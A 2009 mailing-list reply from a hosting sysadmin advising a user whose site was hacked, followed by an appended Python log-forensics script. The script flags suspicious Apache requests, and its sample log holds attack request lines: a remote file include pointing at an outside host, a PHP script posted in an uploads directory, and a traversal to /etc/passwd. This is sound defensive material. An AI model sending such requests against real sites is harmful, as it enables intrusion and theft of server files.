[ubuntu-uk] Website Hacked.....

Matthew Macdonald-Wallace matthew at truthisfreedom.org.uk
Sat Jun 27 20:39:02 BST 2009


All,

Some of you may or may not know that my latest job is working for a  
large UK hosting provider.

The comments in-line below are based on my experiences in trying to  
protect our cluster from hacking attempts.

Quoting Lucy <lucybridges at gmail.com>:

> 2009/6/27 Tony Arnold <tony.arnold at manchester.ac.uk>:
>> John,
>>
>> John wrote:
>>> I run a website, and there's about 2.5 gigs of information on there. The
>>> whole lot got deleted and the hackers put a picture of advertising who
>>> they were. I have managed to get the host to restore as much as they can
>>> back, well, the way they are trying to.

If your host cannot restore from backup, this was either a major hack  
(i.e. the hack happened a long time ago and therefore their current  
backups are all infected) or there are issues with their backup systems.

>>> What is worrying me, is the password was a really strong password, 100
>>> strong according to the password generator, and I was wondering, how
>>> they managed to get in. I can't help worry that it might be through my
>>> netbook. How do I check to see that my computer hasn't been hacked. I
>>> know Ubuntu has a virus checker, but the last time I tried to use it, it
>>> was finding programs that were viruses, and these were programs in the
>>> Synaptic. I was not able to use it in the end, as I didn't know what was
>>> what. Also is there anything I can do to stop my notebook from being
>>> hacked.

A strong password is useless if the hack was carried out using a  
remote file include or a vulnerability in code that was on the website  
to elevate permissions.  From your other comments in the thread, I  
doubt that your netbook is compromised.  I'd lay the blame at the feet  
of Wordpress or similar.

>> Matt and Lucy have given you some good advice and pointers to how your
>> site got hacked. To really find out, you need to do some forensics, but
>> I realise the information you need may no longer be around.

Your hosting provider should be able to provide you with most of this  
information although it is not always easy to be 100% certain about  
when the attack occurred.

>> You need to determine the date & time of when the hack occurred.
>> Creation dates of new files put there by the hackers or modify dates of
>> anything they have changed will give you a clue.
>>
>> You then need to trawl the log files for the web server and look for any
>> unusual looking URLs that have been requested at about the time of the
>> hack. The path in the URL will give a clue as to where the weakness lies.
>>
>> I would also avoid using FTP and use SFTP (via ssh) instead. Strong
>> passwords help, but authentication via ssh keys would be even better.

Unfortunately, there are not a huge number of hosts that allow this as  
it would require enabling command-line access (no matter how  
restricted) to the servers.  As a Systems Administrator, end-users are  
_banned_ from accessing my systems because (to put it quite bluntly  
and this is not aimed at anyone in particular, certainly not on this  
mailing list!) the majority of end users simply do not know what they  
are doing when it comes to file ownership, permissions and what  
constitutes "Secure Code".

>> The concern here is that you restore everything and it just gets hacked
>> again because you haven't fixed the vulnerability.
>
> That's also good advice Tony, but sadly it sounds like John is on
> shared hosting and doesn't have access to the server or control how he
> uses it.
>
> John, my advice right now would be to continue bugging the ISP until
> they restore your sites from backups (although I'm guessing you won't
> get through to anyone until Monday now). That's assuming they do have
> the backups like you said.

We generally will provide as much information as we can to our clients  
as we are firm believers that if you point out the errors in the code,  
end-users learn and tend not to get hacked in future!  If your hosting  
provider are not doing this, then ask them why not.

> For the future, always make regular backups yourself and check that
> they work by restoring from them every now and then(you'd be surprised
> how many people skip this step). You might also consider looking for a
> different provider that uses SFTP.
>
> Also, I've noticed that the sites use cPanel. I've heard that this can
> also have security vulnerabilities if not configured properly, but I
> couldn't say more without someone more knowledgeable being able to
> check the configuration, which isn't likely to happen. It's not
> unusual at all for the ISP to be very cagey about security
> configurations and how this kind of event happened.

There have been issues with cPanel in the past and will probably be  
more in future however I'd pin my money on a remote file include issue  
in either WordPress or PHPBB for the cause of this one.

I'd check the versions of both that you are running and then either  
google for that version and security issues or read the CHANGELOG of  
the latest release and see what it fixes!

Kind regards,

Matt
-- 
Matthew Macdonald-Wallace
matthew at truthisfreedom.org.uk
http://www.truthisfreedom.org.uk/
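The forensics steps Tony lists (bracket the hack using the timestamps of files the attackers created or changed, then trawl the web server log for unusual URLs in that window) as an added example; this is not code from the thread or from any of the people in it. It assumes an Apache combined-format access log and uses a constructed sample; the indicators it flags are the remote file include pattern Matt suspects, a "../" in a parameter, and a PHP script served from an upload directory.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client ident user [timestamp] "METHOD URL PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Constructed sample access log (not from the thread); addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Jun/2009:14:03:40 +0100] "GET /wp-content/plugins/demo/init.php?path=http://198.51.100.9/x.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.8"
198.51.100.22 - - [27/Jun/2009:14:05:02 +0100] "GET /phpbb/viewtopic.php?t=12 HTTP/1.1" 200 8814 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Jun/2009:14:06:15 +0100] "POST /wp-content/uploads/x.php HTTP/1.1" 200 41 "-" "libwww-perl/5.8"
203.0.113.77 - - [27/Jun/2009:19:30:00 +0100] "GET /index.php?page=../../etc/passwd HTTP/1.1" 404 210 "-" "curl/7.19"
"""

def parse_line(line):
    """One combined-format line -> dict with a timezone-aware timestamp, or None if malformed."""
    m = LOG_RE.match(line)
    if m:
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        return rec

def classify(url):
    """Why a requested URL looks unusual in Tony's sense, or None for a normal-looking request."""
    parts = urlsplit(url)
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if re.match(r"(https?|ftp)://", value, re.I):  # parameter naming a remote file: RFI pattern
            return "remote URL in parameter"
        if "../" in value:  # parameter walking out of the web root
            return "path traversal in parameter"
    if re.search(r"/uploads?/.*\.php$", parts.path, re.I):  # executable script under an upload dir
        return "PHP script in upload directory"
    return None

def suspicious_requests(log_text, mtimes, pad=timedelta(hours=2)):
    """(timestamp, client, url, reason) for unusual requests within `pad` of the tampered files' mtimes."""
    start, end = min(mtimes) - pad, max(mtimes) + pad  # bracket the attacker's file timestamps
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and start <= rec["ts"] <= end:
            reason = classify(rec["url"])
            if reason:
                hits.append((rec["ts"], rec["ip"], rec["url"], reason))
    return hits

def demo():
    bst = timezone(timedelta(hours=1))  # constructed mtimes of two attacker-created files, in BST
    mtimes = [datetime(2009, 6, 27, 14, 6, 20, tzinfo=bst), datetime(2009, 6, 27, 14, 7, 5, tzinfo=bst)]
    return suspicious_requests(SAMPLE_LOG, mtimes)
```

On a real site the mtimes come from `find` or `stat` over the web root and the log from the provider; the 19:30 traversal attempt in the sample is deliberately outside the window to show why the time bracket matters before widening the search.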
